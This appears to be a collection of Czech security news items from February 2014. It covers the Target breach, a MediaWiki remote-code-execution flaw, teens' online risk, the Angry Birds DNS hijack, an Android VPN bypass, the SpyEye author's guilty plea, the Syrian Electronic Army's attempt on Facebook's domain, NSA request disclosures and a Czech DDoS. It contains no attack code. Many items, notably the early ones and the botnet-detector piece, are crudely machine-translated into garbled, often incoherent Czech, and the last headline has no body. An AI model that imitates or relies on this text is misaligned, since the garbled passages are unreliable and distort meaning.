Šetření Cíl porušení stále probíhá, a společnost má pochopitelně málomluvný o podrobnostech útoku, ale sdílené , že hackeři byli schopni vstoupit do systému společnosti s využitím pověření ukradené od prodejce. Samozřejmě, že Nezmínil název dodavatele v otázce, a oni neřekli, pro které portál pověření bylo pro, ale to asi není náhoda, že cíl omezený přístup do databáze dodavatelů (Info retrívr) a jejich webové stránky lidských zdrojů (EHR) minulý týden. Do té doby, Brian Krebs byl dělat nějaké jasnozřivostí a byl záplatování dohromady stopy, a je přesvědčen, že útočníci pravděpodobně zjistili, že Target používá určitý kus softwaru, který měl uživatelského účtu správce úroveň s výchozím heslo znát k nim, a zneužila ho nastavit řídicí server v rámci vnitřní sítě cílových tak, aby mohly být shromažďovány ukradené údaje karty v jednom místě, než se dostane exfiltrated. Ten uvádí, že Dell SecureWorks "Counter Threat Unit se také objevil, že jedna složka o malware nainstalován sebe jako službu s názvem "BladeLogic." Název byl zřejmě vybrán napodobovat jméno automatizační software vytvořený BMC, stejná společnost, která prodává software pro správu IT sadu uvedené v předchozím odstavci. Zatímco BMC klesla říci, zda Target používá svůj software, důvěryhodný zdroj potvrdil, Krebs, že mnozí američtí maloobchodníci dělat.


Check Point zjistí kritickou zranitelnost v MediaWiki
8.2.2014 Zranitelnosti
Check Point našel kritickou zranitelnost v MediaWiki projektu webové platformy, populární open source webové platformy používané k vytváření a udržování "wiki" webů. Platforma MediaWiki zahrnuje Wikipedia.org, s více než 94 milionů unikátních návštěvníků měsíčně. Check Point vědci zjistili, že tato kritická zranitelnost vlevo MediaWiki (verze 1.8 a dále) vystaveny ke vzdálenému spuštění kódu (RCE), kde útočník získat úplnou kontrolu nad zranitelný webový server. Tato chyba byla přiřazena CVE-2014-1610 organizace MITRE. K tomu, aby na webu bylo zranitelné, musí být specifické pro ne-výchozí nastavení povoleno v nastavení MediaWiki. Zatímco přesný rozsah dotčených organizací je neznámý, tato chyba zabezpečení byla potvrzena vliv některé z největších známých MediaWiki nasazení na světě. Oni upozornil Wikimedia Foundation o zranitelnosti, a po ověření, Foundation vydala aktualizace a opravy k MediaWiki software. Před dostupnosti patch pro tuto chybu zabezpečení, by útočník mohl podali malware infekce kód do každé stránky na Wikipedia.org, stejně jako do jakékoli jiné vnitřní nebo Web-čelí wiki stránky běží na MediaWiki s postiženými nastavení. Od roku 2006 je to teprve třetí RCE zranitelnost našel na platformě MediaWiki. "Zabere to jen jednu chybu na všeobecně přijaté platformu pro hacker proniknout a způsobit rozsáhlé škody. Check Point Vulnerability Research Group se zaměřuje na zjištění těchto bezpečnostních expozic a zavedení nezbytných real-time ochranu pro zabezpečení Internetu. Jsme rádi, že platforma MediaWiki je nyní chráněn proti útokům na tuto chybu zabezpečení, která by, které představují velké bezpečnostní riziko pro miliony každodenních uživatelů "wiki" na místě, "řekl Dorit Dor, viceprezident pro produkty společnosti Check Point Software Technologies.


Rizikové chování online je uvedení dospívající v nebezpečí
8.2.2014 Bezpečnost
Výzkum McAfee a proti šikaně aliance bylo zjištěno, že 14 - 15 roky staré teenageři jsou s největší pravděpodobností přijmout podstupování rizik chování a overshare on-line, dávat se do potenciálně škodlivých situací a hrozí kybernetické šikany.

Výzkum ukazuje, že 14 až 15 roky a starší koně tráví více času na sociálních médiích, než kterékoli jiné věkové skupiny, s pátým výdaji přes čtyři hodiny přihlášené na každý den. Tito dospívající riziko tvorby sami náchylnější ke zneužívání a šikanování chování digitálně vystavují sdílením příliš mnoho osobních informací on-line, 11% sdílel odhalující videa nebo fotografie ze sebe, 1 v 10 viděl nevhodné, odhalující nebo pornografický obraz někoho, koho vím, on-line a 7% přiznalo "chuti" je nevlídné obraz někoho, koho znají. S 14-15 roky věku takové plodné uživatelů na internetu, to je možná překvapující, že zjištění ukazují, v této věkové skupině jsou uvedení se do potenciálně škodlivých situacích zapojení v nevhodných chování on-line, a jsou s největší pravděpodobností přístup k nebezpečný obsah, být vystaven krutému nebo střední chování a setkat nežádoucí dospělé pozornost. Téměř čtvrtina (23%) z 14 až 15 rok věku dotazovaných viděl porno obrázek online někoho, že nevěděl, a 19% se přiznal k návštěvě webové stránky, které jejich rodiče by neschvaloval. Kromě toho více než polovina 14-15 roky věku dotazovaných také přiznala ke skrytí své online aktivity ze strany rodičů, s téměř čtvrtina (24%) se aktivně mazání jejich historii procházení. Nálezy také ukazují, že děti a mladí lidé zjevně potřebují pomoc, aby pochopili, co je a co není vhodné chování on-line, a rozpoznávat potenciální důsledky svých činů: Přibližně 34% respondentů byli svědky krutého chování on-line, zatímco 22% bylo vystaveno na to sami, polovina z nich připustila, že je opustil pocit rozrušení nebo zlobí. Patnáct procent byl na přijímacím konci faul nebo urážlivé komentáře a 7% bylo řečeno, že se tuk nebo ošklivá. Byl "Tlak vrstevníků" také nejvíce převládající v této věkové skupině, se 19% respondentů připouští, že se vzhlédl sexuální, násilné a další nevhodný obsah, kvůli tlaku od přátel, holka / milenci. Stejná věková skupina vykazovala musí být vedeny on-line na etiketě, aby jasně pochopit rozdíl mezi "škádlení" a šikanu, pouze 23% bylo vidět, že jejich kruté a zneužívající připomínky lze považovat za průměr na osobu na přijímací straně, s-se stejným počtem vidět tyto připomínky jako "jen škádlení." Když to přišlo k cizinec nebezpečí, jeden z deseti (11%), 14 - 15 roky koně byli osloveni dospělé osoby, které neznali on-line. Znepokojující je, že téměř jedna třetina (32%) z těch teenagerů přiblížil se pak sdílené nevhodné věci, jako jsou obrazy samy o sobě s tímto cizincem, který se později litoval. Ještě znepokojivější stále, pětina (20%) uvedlo splnění této dospělá osoba osobně před Uvědomil si, že vztah byl nevhodný. McAfee Cyber ​​Security Expert, Ráj Samani řekl: "Ochrana dětí on-line, je absolutní minové pole, se snadným přístupem na Internet přes chytré telefony , tablety a počítače, rodiče je třeba dosáhnout rovnováhy mezi sociální svobody a bezpečnosti pro dospívající. Tato zpráva upozorňuje na rostoucí potřebu pro rodiče mít upřímné rozhovory se svými dětmi kolem hrozby on-line, čistý etiketu a povahu kybernetické šikany, jakož i zajištění toho, aby domácí zařízení jsou tak účinně zabezpečeny pokud možno z pochybného obsahu. " Luke Roberts, Národní koordinátor pro boj proti šikaně aliance řekl: "Digitální svět je jeden obydlený většinou mladých lidí na denní bázi, ale jsou jasně snaží pochopit, on-line etikety, jaké potřeby on-line chování, nebo jak se udržet v bezpečí. Naše nálezy upozornit na nebezpečí digitální expozice. Ty naznačují, že mladí lidé, zejména mladí teenageři, jsou zobrazeny podstupování rizik chování a volně sdílení informací s tím, co je v podstatě globální, a někdy i anonymní, masové publikum, aniž by chytil trvalost těchto výměn. "Tím, že soukromé informace o veřejný majetek, mladí lidé se vystavují komentovat a pozornost od ostatních, aniž by nutně museli dovednosti pro řešení případných situací, které by mohly vzniknout z těchto on-line interakcí. Jako dospělí, je naší povinností učit děti a mladé lidi, digitální dovednosti a stanovit hranice tak, aby byly schopni realizovat obrovské výhody a příležitosti, které internet nabízí, pokud jde o přístup k informacím a navazování přátelství, ale také zajišťuje, že jsou v bezpečí a bez šikany online i offline. " Výzkum byl pověřen společností McAfee a provádět Atomik výzkum ve Velké Británii. 1012 UK děti ve věku od 10 do 17 a 1013 britských dospělých pacientů s alespoň jedním dítětem ve věku mezi 10 až 17 mezi byly šetřeny. Průzkum byl proveden v říjnu a listopadu 2013.


Angry Birds web poškozeno o "anti-NSA" hacker
7.2.2014 Kriminalita
Oficiální internetové stránky populární Angry Birds hry finské společnosti Rovio byl krátce znetvořil v úterý večer, a byl učiněn na sport na následující obrázek:

Znetvoření byl tak krátký, jak přimět lidi zajímalo, jestli se to opravdu stalo, ale i společnosti a Zone-h.com to potvrdil. Nakonec, místo nebyla ohrožena - útok se ukázalo, že je DNS únos, který z domény přejděte na dvou různých IP adres. "znetvoření byl chycen v minutách a okamžitě opraveny," uvedl Rovio VP Marketing Communications Saara Bergström. "Údaje o koncový uživatel byl bez rizika na jakémkoli místě. Vzhledem k tom, jak Rozlišení jméno internet funguje, pro většinu oblastí nebylo vidět vůbec, ale některé oblasti trvat na správné informace, které mají být aktualizovány." Útok byl proveden hacker, který daboval sám sebe jako "Anti-NSA hackera", a byl zřejmě motivován nedávné zprávě prohlašuje, že USA NSA a UK GCHQ jsou cílené "děravé" telefonní aplikace s cílem shromáždit uživatelská data. Zpráva uváděla, aplikace Angry Birds jménem. Rovio reagovala na něj oficiálně říkat, že oni nejsou "sdílet data, spolupracovat nebo se domluvit s žádnými tajnými vládními jako je NSA nebo GCHQ kdekoli na světě." "údajné sledování může být prováděny prostřednictvím reklamních sítí třetích stran používají miliony komerčních webových stránek a mobilních aplikací ve všech průmyslových odvětvích Pokud reklamních sítí jsou opravdu cílené, zdá se. že žádný internet-umožnil zařízení, které navštíví webové stránky ad povoleny nebo používá aplikace ad povolen je imunní vůči takovým dohledem. Rovio neumožňuje jakékoliv sítě třetí stranou použít nebo předat osobních údajů koncových uživatelů z aplikace Rovio, " uvedl Mikael Hed, generální ředitel společnosti Rovio Entertainment. "V zájmu ochrany našich koncových uživatelů, budeme, stejně jako všechny ostatní společnosti s využitím třetí strany reklamních sítí, musí přehodnotit práci s těmito sítěmi, pokud jsou používány pro špionáž účely.


VPN pass útok možný i na Android Kitkat
7.2.2014 Počítačový útok | Mobil
Bezpečnostní výzkumníci na Ben Gurion University v Izraeli jsou na roli, pokud jde o zjištění Android bezpečnostní nedostatky, a odhalil existenci kritické chyby v nejnovější verzi mobilního operačního systému.

Na konci prosince, publikovali svá zjištění týkající se chyby zabezpečení, které zpočátku věřil být v Samsung Knox architektuře, ale ukázalo se, že Android 4.3 chyba, která dovolila útočníkovi provést útok typu man-in-the-Middle obcházet konfigurace VPN zachytit údaje . V pondělí, sdíleli, že Android 4.4 ("KitKat"), je citlivý na stejný útok (s určitými úpravami). "Zpočátku jsme se nemohli rozmnožovat ji s původním kódem zranitelnosti od KitKat má upravenou implementaci zabezpečení," Výzkumníci uvedeno v blogu . "Po komplikované vyšetřování jsme byli schopni reprodukovat stejnou chybu, kdy škodlivý aplikace může obejít aktivní konfiguraci VPN (bez ROOT oprávnění potřebná) a přesměrovat zabezpečené datové komunikace na jinou adresu sítě. Tyto komunikace jsou zachyceny v CLEAR TEXT (bez šifrování), přičemž tyto informace zcela vystaven. Tento přesměrování může konat při odchodu uživatele zcela lhostejný, věřit, že data jsou šifrována a bezpečné. " Google má, samozřejmě, byl oznámen v obou případech, a výzkumníci pochopitelně jsi 't jít do konkrétní informace o jejich využití nebo zranitelnosti, a že informace nebude sdílet, dokud chyba je opravena. Oni nezmínil, pokud se domnívají, že chyba je využíván ve volné přírodě se zlými úmysly útočníků, takže je to bezpečné předpokládat, nevědí. Samozřejmě, že to neznamená, že tam nejsou.


Mnoho Android aplikace mohou sledovat vaši polohu, přístup k fotografiím
7.2.2014 Mobil
Alarmující podíl Android aplikací můžete najít a otevřít soukromé fotografie na smartphony, umístění uživatelů Track, prozradit e-mailové adresy na internetu a úniku adresáře a telefonní protokoly, podle analýzy 836021 Play Store Android aplikací. Přes 35% z aplikací analyzovaných BitDefender můžete sledovat polohu uživatele, s téměř 3% budou moci získat přístup k umístění, i když je spuštěna aplikace bez vědomí uživatele v pozadí. Více než 6% z těchto aplikací lze také zaslat umístění zařízení přes internet. údaje také ukázaly, že až 3% z aplikací analyzovaných může prozradit e-mailové adresy na internetu: 1749 Nahráno adresu přes šifrované spojení s další 1,661 Přitom přes nešifrované spojení, které by mohly být snadno zachycena. Zjištění zvýšit další obavy s ohledem na odhalení bývalý americký inteligence dodavatele Edward Snowdena, že NSA a GCHQ plánoval extrahovat data z chytrých telefonů uživatelů 'pomocí aplikacích, jako je populární . Angry Birds hra "Naše nejnovější studie ukazují, že většina chytrých telefonů nebo tabletů majitelé mají alespoň jednu aplikaci - a pravděpodobně několik -, které by mohly být použity k sifonu citlivých informací ze svých telefonů," říká Catalin Cosoi, Chief Security stratég BitDefender. " významný podíl žádostí bylo prokázáno, že je schopen prozradit detaily přes internet pomocí nešifrované spojení. S telefony nyní nese větší podobnost s mini počítačů, je obzvláště znepokojující, když vezmete v úvahu obrovské množství vysoce osobních údajů o něčí identity, plán, přátelé, činnosti a práce, které každé zařízení může obsahovat, "dodal Cosoi. Neoprávněné oprávnění může poskytovat přístup k umístění zařízení je, adresáře, telefonní záznamy a geografická data z fotografie nahrané na mobilní verzi stránek sociálních sítí. Facebook a Twitter oba jasné fotky metadat před zveřejněním, ale třetí strana mohla duplikovat informace, jak to cestuje přes mobilní sítě operátora a uloží ji k dalšímu zpracování. To se také může stát, když poskytovatelé reklam třetích stran přijmout data z telefonu použít pro cílené reklamy. V tomto případě je reklamní síť slouží pouze jako vektor. analýza BitDefender také ukázal, že více než 5% z aplikací analyzovaných mohl najít a otevřít fotky na telefonu, s téměř 10%, včetně oprávnění ke čtení seznamy kontaktů. Mnozí z nich mají oprávněnou potřebu těchto údajů, ale jiní jsou jasně dotěrný. Cosoi dodává: "Oprávnění vztahující se k sociálním sítím a senzorů zařízení, jako jsou kamery, mikrofon a GPS, je velmi pravděpodobné, že sběr a vstupy zpráva. Doporučujeme uživatelům neinstalovat takové aplikace, pokud se cítí pohodlně se tato informace přistání v rukou třetí strany.


 


SpyEye tvůrce přiznává, že
7.2.2014 Viry
Aleksandr Andrejevič Panin, ruský národní známý také jako "Gribodemon" a "Harderman," se přiznal ke spiknutí za účelem spáchání drát a bankovní podvody za jeho roli jako primární vývojář a distributor SpyEye bankovnictví Trojan.

Ovládání z Ruska 2009-2011, Panin spikli s ostatními, včetně codefendant Hamza Bendelladj, alžírský občan také známý jako "BX1," rozvíjet, nabízet a prodávat různé verze viru SpyEye a součásti na internetu. Panin povolené cyber zločinci, jak přizpůsobit své nákupy zařadit na míru metody získávání osobní a finanční údaje obětí, stejně jako verze na trh, které se specificky cílené určených finančních institucí. On inzeroval virus SpyEye na on-line, pozvání pouze trestní fórech, a prodával verze viru SpyEye za ceny v rozmezí od $ 1,000 8,500 dolar. On je věřil, že prodal virus SpyEye alespoň 150 "klientů", kteří, v pořadí , používá je nastavit své vlastní velení a řízení (C & C) servery. Jeden z jeho klientů, "Soldier", údajně z více než 3,2 milionu dolarů v období šesti měsíců s použitím viru SpyEye. V únoru 2011 FBI hledal a chytil SpyEye (C & C) serveru údajně provozuje Bendelladj v severní District of Georgia. Tento server řízený přes 200 počítačů infikovaných virem SpyEye a obsahoval informace z mnoha finančních institucí. V červnu a červenci 2011 FBI skryté zdroje komunikovali přímo s Panin, který byl pomocí své on-line přezdívky "Gribodemon" a "Harderman," o SpyEye virus. Zdroje FBI poté zakoupili verzi SpyEye z Panin, které jsou obsaženy prvky, jejichž cílem je ukrást důvěrné finanční informace, zahájit podvodné on-line bankovní transakce, nainstalujte dřevorubci stisků kláves, a iniciovat distribuované odmítnutí služby útoky z počítačů infikovaných malware. Bendelladj byl zadržen na letišti Suvarnabhumi v Bangkok, Thajsko, na 05.01.2013 a byl vydán z Thajska do Spojených států, 2. května 2013. Jeho náklady jsou v současné době probíhá v severní obvod Gruzie. Panin byl zatčen americkými orgány dne 1. července 2013, když letěl přes Hartsfield-Jackson Atlanta mezinárodní letiště. Šetření také vedlo k zatčení čtyř klientů Panin v SpyEye a společníci ve Spojeném království a Bulharsku. Dne 28.ledna 2014, Panin přiznal ke spiknutí za účelem spáchání drát a bankovní podvody. Odsouzení za Panin je naplánováno na 29.dubna 2014. Podle odhadů průmyslu, virus SpyEye napadl více než 1,4 milionu počítačů ve Spojených státech a do zahraničí, a to byl vynikající malware nástrojů používá od přibližně do roku 2009 do roku 2011. Na základě informací obdržených z odvětví finančních služeb základě, se více než 10.000 bankovní účty byly ohroženy infekcí SpyEye jen od roku 2013. Někteří počítačoví zločinci nadále používat SpyEye dnes, ačkoli jeho účinnost byla omezena, neboť tvůrci softwaru přidali SpyEye programů odstranění škodlivého softwaru.


Spotřebitelé více starat o sběr dat podnikání než státní dozor
7.2.2014 Bezpečnost
TRUSTe vydala své nejnovější USA Index spotřebitelské důvěry, která ukazuje, že vysoký podíl dospělých v USA ve věku 18 let a starší se obávají o své soukromí on-line, on-line důvěra klesá a potenciální dopad na podnikání je stále vysoká.

74 procent uživatelů internetu v USA se více zajímají o ochraně osobních údajů než před rokem a více uživatelů citovat sběr dat podnikání, než vládní programy dozoru, jako důvod pro zvýšení jejich obavy. "I přes veškerou medializaci vládní programy dozoru, jako jako NSA PRISM, více spotřebitelé nadále obávají podniky sběru své informace s pouze 55 procent pravidelně ochotni podělit se o své osobní údaje online. Tyto nálezy vyslat jasný signál, že sběr obchodních údajů, není vláda činnost, je hlavní hnací silou pro zvýšené obavy o soukromí , "řekl Chris Babel, generální ředitel společnosti TRUSTe. "Zatímco některé podniky podnikají kroky dnes řešit otázky ochrany osobních údajů, mnozí nejsou, a bar stoupá." přidal Babel, "Tento výzkum ukazuje, že lidé jsou přesvědčeni, řízení jejich soukromí, ale akce, které se užívají jsou špatné pro podniky což je méně pravděpodobné, že ke kliknutí na reklamy, používat aplikace, nebo povolit umístění sledování na chytré telefony. Společnosti musí jednat nyní na ochranu spotřebitele a jejich osobní údaje, které jsou životně důležité pro úspěch jejich podnikání, a řešení těchto vysokých obavy o ochraně osobních údajů, aby . vytvořit on-line důvěru, minimalizovat rizika a udržet si náskok před konkurencí " Průzkum ukazuje, že:

Obavy spotřebitelů ochrany osobních údajů on-line i nadále vysoká 92 procent amerických uživatelů internetu se nemusíte bát jejich soukromí on-line (až z 89 procent v lednu 2013 a 90 procent v lednu 2012)
Více než polovina uživatelů internetu v USA 55 procent uvedlo, že věří většina podniků s jejich osobním informacím on-line (pokles z 57 procent v lednu 2013 a 59 procent v lednu 2012), a
89 procent spotřebitelů (žádná změna od ledna 2013 až z 88 procent v lednu 2012), uvedl, že vyhnout podnikání s firmami, které nevěří chránit své soukromí na internetu.
TRUSTe 2014 US spotřebitelská důvěra Ochrana Zpráva
vedením on-line Harris Interactive jménem TRUSTe, průzkumu, který probíhal on-line u 2019 dospělých v USA v období mezi prosincem 11-13, 2013, ukazuje, že celkové obavy týkající se soukromí amerických on-line dospělých zůstávají vysoké, 92 procent starosti alespoň někdy o své obecné ochrany soukromí na internetu ve srovnání s 89 procenty v nálezech z podobné studie provedené přes Harris Interactive v lednu 2013. Když američtí uživatelé internetu, kteří se více zajímají o své soukromí on-line, než byly před rokem byli požádáni podrobněji o hlavních příčin obav soukromí, podniky sdílení osobních informací a společnostem sledování online chování na špičce seznamu obav. Konkrétní zjištění patří:

58 procent se obává podniky sdílet své osobní údaje s jinými společnostmi;
47 procent se obává firem sledování jejich online chování je zaměřit se reklamy a obsahu, a to pouze
38 procent uvedeny mediální pokrytí programů vlády USA dozoru jako důvod pro zvýšení zájmu.
Důvěra spotřebitelů se snížila a 70 procent uživatelů internetu v USA cítí jistější o správě jejich soukromí než před rokem a společné akce, které užívají patří:
83 procent je méně pravděpodobné, klikněte na reklamy
80 procent uživatelů chytrých telefonů se zabránilo používání smartphone aplikace, které nevěří chránit jejich soukromí
74 procent uživatelů chytrých telefonů jsou méně pravděpodobné, že k tomu, aby sledování polohy na svém smartphonu.
Kromě těchto akcí, 76 procent spotřebitelů jsou s větší pravděpodobností se podívat na certifikaci ochrany osobních údajů a těsnění na řešení své obavy o ochraně osobních údajů.


IT podceňuje cloud využití app 90%
7.2.2014 IT
Cloud aplikace přijetí se nadále šíří přes prakticky všechny obchodní funkce, od marketingu v oblasti lidských zdrojů. Nicméně, zatímco podnikové aplikace využití se dále roste, Netskope zjistil, že je stále v nevědomosti o jeho využití - v průměru IT profesionálové podceňovat cloud app uplatnění v jejich organizacím 10X, s typickou podniku, který používá 397 aplikací.

Navíc, 77 procent z cloudových aplikací nejsou enterprise-ready, takže IT s výzvou zajištění 10 krát více aplikací, než si mysleli, že je třeba zajistit. Nová zpráva představila nejoblíbenější cloudových aplikací v podniku, jak je definována počtem z různých zasedání app. Twitter vede žebříček a je stále relevantní podniky jako subjekty z oboru marketingu, prodejci, výzkumu a vývoje, a manažeři si sociální média se působivých nástroj. Zatímco populární spotřebitele apps Facebook a LinkedIn také vysoce hodnoceno, oni nedělali top 10. pět nejrozšířenější cloud app kategorie v Netskope Aktivní platformy jsou: Marketing, s 51 cloudových aplikací na podnik, HR s 35 aplikacemi, skladování s 26 aplikace;. a CRM / SFA a spolupráce, s 23 aplikacemi každý Snad nejnápadnější z nich je počet personálních aplikací na podnik. Zatímco HR je široká kategorie, s konkrétními aplikacemi pro dávky, plat, výkon, čas-sledování, a více, v průměru 35 HR aplikace na podnik zvyšuje zabezpečení a dodržování předpisů obavy pro IT profesionály. va také počet Storage aplikací za podnik jako pozoruhodně vysoká na 26 let. Na rozdíl od marketingu a lidských zdrojů, které pokrývají širokou sadu funkcí, skladové aplikace jsou užší oblast působnosti, a mají nadbytečné funkce. Dokonce i organizace, které se rozhodly sjednotit na jedné aplikace pro skladování, jako Dropbox nebo Google disku objevili "dlouhý ocas" z takových aplikací, které jsou nepotrestány, ale v provozu. Mezi nejčastější činnosti v cloud aplikace jsou edit, view, download, post, a podíl. Činnosti, jako je nahrávání, sdílení a stahování patří mezi nejsledovanější, protože může signalizovat únik dat nebo porušení shody. Dnes, většina z porušení zásad vést k "upozornění" akce versus "bloku". K dnešnímu dni, schopnost blokovat konkrétní činnosti v rámci cloudových aplikací je poměrně vznikající na trhu, a IT odborníci jsou nyní začínají balit své paže kolem, které činnosti jsou prováděny předtím, než začnou omezení činnosti.


Kyberzločinci neúspěšně zaútočili na Facebook

7.2.2014 Sociální sítě
Skupině útočníků, známé pod názvem Syrská elektronická armáda (SEA), se podařilo změnit kontaktní informace v doménových registrech na webu facebook.com, změnit adresu webu na jiný server se jim však nepodařilo.

Skupina na Twitteru zveřejnila kopii obrazovky ovládacího panelu společnosti MarkMonitor, jež spravuje doménová jména velkých společností. Zabývá se také ochranou duševního vlastnictví a internetových značek. Služba společnosti, která slouží ke správě domén, podle webu MarkMonitoru „zajišťuje bezpečnost domén posíleným portálem a prémiovým bezpečnostním řešením, včetně pokročilých bezpečnostních opatření na úrovni registrů.“

SEA se podle všeho na MarkMonitor zaměřila právě kvůli útoku na Facebook, který v úterý oslavil své desáté výročí. Skupina použila ovládací panel k úpravě informací WHOIS a kontaktní adresu domény změnila na místo v Syrském Damašku.

Kyberzločincům se však nepodařilo upravit nastavení DNS a server přesměrovat na jiný pod kontrolou SEA, jako se jim to podařilo již u několika webů v minulosti. Facebook totiž používá funkci „zamčení registrů“, která při každé změně doménového jména vyžaduje dodatečné potvrzení člověkem.

To, jak se SEA podařilo panel zpřístupnit, se neví a společnosti MarkMonitor ani Facebook tuto situaci nijak nekomentovaly. Z ostatních snímků, které útočníci zveřejnili, lze poznat, že získali přístup i k doménovým jménům Amazonu, Googlu, Yahoo a dalších známých společností, které však používají stejnou ochranu jako Facebook.

Operace SEA mimo jiné zahrnují také phishing zaměřený na konkrétní zaměstnance společností s cílem získání citlivých informací pomocí sociálního inženýrství. Minulý měsíc se skupině podařilo zveřejnit zprávy na oficiálních blozích Microsoftu a Office poté, co z několika zaměstnanců vymámili přihlašovací údaje k e-mailům.

SEA své schopnosti zneužívá pouze k šíření politických zpráv podporujících syrského prezidenta a vládu, tento druh útoku však může být využit i k zákeřnějším cílům, například ke krádeži údajů či nakažení počítačů malwarem.


Velké firmy zveřejnily detaily spolupráce s NSA

6.2.2014 Bezpečnost
Každého půl roku putovala data z tisícovek uživatelských účtů služeb provozovaných Microsoftem, Googlem, Facebookem a Yahoo k pracovníkům americkým tajných služeb.

Dělo se tak na základě tajného soudního příkazu, který technologickým gigantům současně zakazoval zveřejnit jakékoliv podrobnosti. Americký úřad Ministerstva spravedlnosti však nyní celé čtveřici vyšel vstříc a udělil jim povolení promluvit o určitých detailech jejich spolupráce s Národní bezpečnostní agenturou (NSA) v rámci špehovacího programu PRISM.

Toto povolení má však jistá omezení. Společnosti například smí zveřejnit podrobnosti pouze o datech, která NSA získala na základě příkazu vydaného před více než 6 měsíci.

„Stále si myslíme, že je zapotřebí ještě o trochu více transparentnosti. Jedině tak bude moci každý porozumět tomu, jak fungují příslušné zákony a zda slouží veřejnému zájmu či nikoliv,“ napsal právní ředitel Googlu Richard Salgado na oficiálním blogu. Zejména by prý měly mít společnosti možnost zveřejnit přesné počty žádostí, jejich povahu a počet uživatelé, kterých se nějakým způsobem dotkly.

Zatím jsme se dozvěděli například to, že v období od ledna do června 2013 jen Google předal vládní agentuře metadata až z 999 uživatelských účtů a obsah komunikace 9 000 až 9 999 zákazníků. Microsoft ve stejném období obdržel méně než 1 000 žádostí o záznamy komunikací, do kterých bylo zapojeno 15 000 až 15 999 účtů.

O něco aktivnější muselo být Yahoo, které úřadům za první polovinu loňského roku předalo informace z 30 000 až 30 999 uživatelských účtů. V případě Facebooku byl pak vznesen požadavek na údaje z 5 až 6 tisícovek účtů, přičemž v druhém pololetí roku 2012 to bylo téměř o 1 000 účtů méně.

Společnosti Microsoft, Facebook a Yahoo rovněž formou obsílek obdrželi také několik žádostí od FBI. Na tyto žádosti se však nevztahoval soudní příkaz, takže společnosti nemusejí se zveřejněním informace počkat 6 měsíců. Vím tedy, že za poslední půlrok jen Microsoft obdržel takových obsílek až 999. Facebook, Yahoo, Google, ale i LinkedIn uvedli stejné číslo.

Povolení zveřejnění se však vztahuje pouze na datové žádosti, nikoliv už třeba na záznamy telefonních hovorů. Společnosti proto podle svých slov budou i nadále tlačit na americké úřady, aby je zbavily mlčenlivosti i v těchto dalších případech.


DDoS útok zasáhl české weby

5.2.2014 Počítačový útok
Někteří tuzemští uživatelé se ve středu dopoledne potýkali se zpomalením internetového připojení. Důvodem byl útok typu Distributed Denial of Service (DDoS) na jednoho z největších telekomunikačních poskytovatelů v Česku – společnost GTS Czech. O útoku informoval server Lupa.
„Ve středu jsme zaznamenali útok na naše DNS servery. Probíhal od 8.45 hod. zhruba dvě hodiny,“ řekla Novinkám Lucie Řeřichová, mluvčí společnosti GTS Czech. DNS servery překládají webové adresy na číselné adresy fyzických počítačů (IP adresy).

„DNS platformy byly tímto útokem zpomaleny, nikoli vyřazeny z provozu, a docházelo ke zpoždění v rámci poskytovaných odpovědí na DNS dotazy. Intenzivně pracujeme na řešení problému a implementaci obranných opatření,“ podotkla Řeřichová s tím, že doposud si na problémy stěžovaly dvě desítky zákazníků.

Kybernetickým útokům typu DDoS čelily začátkem března loňského roku také některé tuzemské servery. Směřovány byly nejprve na zpravodajské weby, poté na portál Seznam.cz, servery bank a telefonních operátorů. Bezpečnostní experti v této souvislosti hovořili o největším útoku v historii českého internetu.


Zombie detektor : Half- století - starý nástroj může pomoci vyčenichat botnety , vědci tvrdí,

5.2.2014 BotNety

 Statistický nástroj poprvé použit v roce 1966 a v současné době používají v řeči a rozpoznávání gest může držet klíč k popotahování z robotické sítě - tím, že předpovídá pravděpodobný " další krok " z infikovaných počítačů a zdravých počítačů po nich , podle Science Daily .

Výzkumníci z PSG College of Technology , Coimbatore , Indie vyvinula nástroj, který může dělat " zombie " počítače vyčnívat z davu , analýzou jejich činnosti okamžitě - proces, který je často " jako snažit se identifikovat jednu zlatou rybku v obřím akváriem , " podle zprávy Slashdot je .

Tento nástroj používá model skrytých Markov , statistický nástroj, který umožňuje výzkumníkům , aby předpovědi budoucího chování , aniž by věděl o historii minulosti daného systému . Výzkumníci sledovat datové pakety přicházející dovnitř a ven z PC , a používat to , aby se " předpovědi " , jakinfikovaný počítač může chovat , a kontrastující to "normální" chování počítače ve stejném systému . Vědci přirovnávají proces předpovídání počasí . Skryté Markovovy modely , jsou používány značně v rozpoznávání řeči a rozpoznávání gest dnes , ale statistické modely byly poprvé použity v šedesátých letech .

Vědci píší, že "tým použil statistické logiku skrytou modelu semi- Markov předvídat vlastnosti internetové aktivity na daném počítači podezření z toho, žezombie počítače v botnetu ... Tyto proměnné jsou komponenty používané pro řízení tok datových paketů a ven z počítače prostřednictvím internetového protokolu . Jejich přístup může modelovat "normální" chování a pak zvýrazněte aktivit robotické sítě jakoodchylka odnormálu bez konkrétních proměnných, které jsou změněny malware prozatím v očích . "

Vědci píší, že zatímco AV software může odhalit malware , který řídí počítače v botnetu , zločinci jsou neustále přizpůsobuje své techniky , a naznačují, že jejich nástroj může nabídnout způsob, jak " uzamknout " botnety a zombie PC rychle .

V reseachers poukazují na to, že " malware vývojáři se zaměřili v poslední době na web-based , http , typ činnosti, který je jednodušší zamaskovat mezi nesčetnými paketů dat pohybujících se tam a zpět přes síť a do a ven z určitého počítače , " a říkají, že jejich nástroj skrytých Markov nabízí "systém detekce lehký a real-time můžete vidět prostřednictvím tohoto přestrojení snadno . Zavedou-li se široce , jako je systém mohl uzamknout tento druh botnet velmi rychle a zpomalovat vstřebávání zombie počítačů, zločinci a jiní se zlým úmyslem . "

Zpráva Slashdot je poznamená, že identifikace malý počet infikovaných počítačů mezi tisíci může být obtížné - " . Může nabídnout naději " , a že tento nástroj

 " Identifikace volání mezi jednotlivými zombie PC a botnet , která ji vlastní , zevnitř společnosti s tisíci počítačových systémů , je jako snažit se identifikovat jednu zlatou rybku mezi tisíci v obřím akváriu : mezi tisíci jinými dělá téměř totéž , je to těžké určit jednu rybu se zlem na jeho mysl , " píše se ve zprávě , " Alepůl století starý statistický nástroj pro analýzu mohou nabídnout větší naději tím, že naznačuje, dost o chování dobře upravených ryb , aby se chování ty špatné vyniknout . "

Příspěvek Zombie detektor : Half- století - starý nástroj může pomoci vyčenichat botnety , vědci tvrdí, objevil se na prvním místě Žijeme zabezpečení .


Slabá hesla a starobylé software opustil údaje vlády USA zranitelné , zpráva DHS najde

5.2.2014 Šifrování

